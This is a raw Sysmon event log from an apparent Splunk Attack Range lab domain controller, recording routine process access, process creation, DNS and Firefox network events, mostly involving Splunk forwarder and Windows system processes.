10341000x8000000000000000300118Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.027{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300117Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.027{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300116Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.027{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1B07-6216-9607-000000003802}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000300115Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.027{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1B07-6216-9607-000000003802}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000300114Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.029{C8EA50B7-1B07-6216-9607-000000003802}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000300164Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.719{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local59020- 10341000x8000000000000000300163Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:20.743{C8EA50B7-1B08-6216-9807-000000003802}33646344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300162Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:20.512{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1B08-6216-9807-000000003802}3364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300161Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:20.512{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300160Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:20.512{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300159Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:20.512{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300158Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:20.512{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300157Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:20.512{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1B08-6216-9807-000000003802}3364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000300156Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:20.512{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1B08-6216-9807-000000003802}3364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000300155Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:20.513{C8EA50B7-1B08-6216-9807-000000003802}3364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000300154Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.416{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49698-false93.184.220.29-80http 354300x8000000000000000300153Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.415{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49697-false93.184.220.29-80http 354300x8000000000000000300152Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.415{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49696-false93.184.220.29-80http 354300x8000000000000000300151Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.414{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58358- 354300x8000000000000000300150Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.407{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58873- 354300x8000000000000000300149Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.379{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1-58394-false127.0.0.1-53domain 354300x8000000000000000300148Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.369{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-58394- 354300x8000000000000000300147Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.369{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:0:0:98f0:e32b:fbf:ffff-58394-true7f00:1:0:0:0:0:0:0-53domain 354300x8000000000000000300146Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.353{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49693-false35.244.181.201201.181.244.35.bc.googleusercontent.com443https 354300x8000000000000000300145Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.353{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49695-false35.244.181.201201.181.244.35.bc.googleusercontent.com443https 354300x8000000000000000300144Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.353{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49694-false35.244.181.201201.181.244.35.bc.googleusercontent.com443https 354300x8000000000000000300143Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.352{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58394- 354300x8000000000000000300142Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.352{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local50910- 10341000x8000000000000000300141Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.996{C8EA50B7-1B07-6216-9707-000000003802}62766180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000300180Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:21.759{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C734B273147CE27B32814389C9326F4,SHA256=BC71EC08FC5C8CEBA7D09137AD3E7B2E0D9B0D0B4420E65CFDBF3C18CF58E119,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223899Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:21.005{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D40CE174A05AEB3C3D506BDA67768C5,SHA256=AF9B7ABD66FB4EB6C7CEC0F2B5A031C31100E30E9E0EAACACCE7DECBC28A0FBA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300179Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:21.027{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1B09-6216-9907-000000003802}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300178Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:21.027{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300177Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:21.027{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300176Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:21.027{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300175Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:21.027{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300174Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:21.027{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1B09-6216-9907-000000003802}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000300173Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:21.027{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1B09-6216-9907-000000003802}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 